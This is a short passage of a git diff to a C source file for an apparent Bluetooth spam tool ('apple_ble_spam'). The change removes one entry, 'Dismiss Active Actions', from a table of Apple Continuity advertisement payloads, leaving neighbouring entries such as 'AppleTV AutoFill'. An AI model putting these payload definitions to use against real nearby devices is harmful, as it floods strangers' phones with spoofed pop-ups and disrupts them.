b/applications/external/apple_ble_spam/apple_ble_spam.c index cfdb5fe95..5609cd696 100644 --- a/applications/external/apple_ble_spam/apple_ble_spam.c +++ b/applications/external/apple_ble_spam/apple_ble_spam.c @@ -64,14 +64,6 @@ static Payload payloads[] = { .type = ContinuityTypeNearbyAction, .data = {.nearby_action = {.flags = 0xC0, .type = 0x00}}, }}, - {.title = "Dismiss Active Actions", - .text = "Close current Nearby Actions", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0x00, .type = 0x00}}, - }}, {.title = "AppleTV AutoFill", .text = "Banner, unlocked, long range", .random = false,